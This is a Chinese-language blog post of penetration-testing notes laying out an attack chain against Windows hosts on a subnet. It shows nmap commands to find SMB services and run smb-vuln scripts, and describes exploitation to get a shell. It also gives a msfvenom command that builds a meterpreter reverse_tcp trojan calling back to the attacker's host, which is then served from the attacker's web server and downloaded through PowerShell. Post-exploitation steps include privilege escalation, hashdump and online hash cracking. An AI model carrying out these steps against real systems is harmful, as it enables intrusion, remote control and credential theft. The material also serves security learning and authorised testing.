滲透測(cè)試思路一些總結(jié)

整體思路轉(zhuǎn)自:paper.tuisec.win/detail-119767e6b79612b.html?

掃描C段或B段網(wǎng)段存活主機(jī),www.itdecent.cn/writer#/notebooks/11379001/notes/15623216

或利用nmap掃描存在smb服務(wù)的主機(jī)(這里主要測(cè)試存在smb漏洞的主機(jī))

nmap -A -p 139,445 x.x.x.1-254 -oG smb_service.txt

其中,-A 代表掃描版本號(hào)和系統(tǒng)

-oG 輸出到文件

cat smb_service.txt | grep 'windows' | cut -d " " -f2 > smb_service_host.txt

cut命令類(lèi)似于awk的作用,-d 分隔符,-d " "以空格為分隔標(biāo)志。-f 2選擇第二個(gè)

掃描存在smb漏洞的主機(jī)

find / -name smb*vuln*.nse 查找nse腳本文件

for vul in$(find / -name smb*vuln*.nse | cut -d"/"-f 6);do nmap -v -p 139,445 --script=$vul -iL smb_server_host.txt -oN smb_vulns_$vul.txt;done

nmap -iL 輸入文件

-oN 輸出文件

漏洞利用

若成功,則返回shell

但此shell不穩(wěn)當(dāng),要想辦法獲得meterpreter,獲得更強(qiáng)大的功能

后滲透

得到初步的shell后,檢查目標(biāo)系統(tǒng)的操作系統(tǒng)版本,以生成對(duì)應(yīng)版本的木馬

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f exe -a x64 --platform win -o mp_64.exe

上傳meterpreter的木馬到攻擊機(jī)的/var/www/html下,方便下載

重新開(kāi)啟一個(gè)msfconsole并開(kāi)啟監(jiān)聽(tīng)。


重要一步:利用不穩(wěn)當(dāng)?shù)膕hell創(chuàng)建一個(gè)powershell用于下載我們的meterpreter木馬

ps怎么寫(xiě)?(還未研究)

仿照原文作者大牛寫(xiě)的,

下載成功,運(yùn)行木馬文件l.exe,成功獲得meterpreter

meterpreter后滲透,getuid,getsystem(提權(quán))、shell獲取shell,hashdump獲取hash密碼,并可通過(guò)http://www.objectif-securite.ch/en/ophcrack.php一個(gè)在線(xiàn)的LMHash破解網(wǎng)站

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容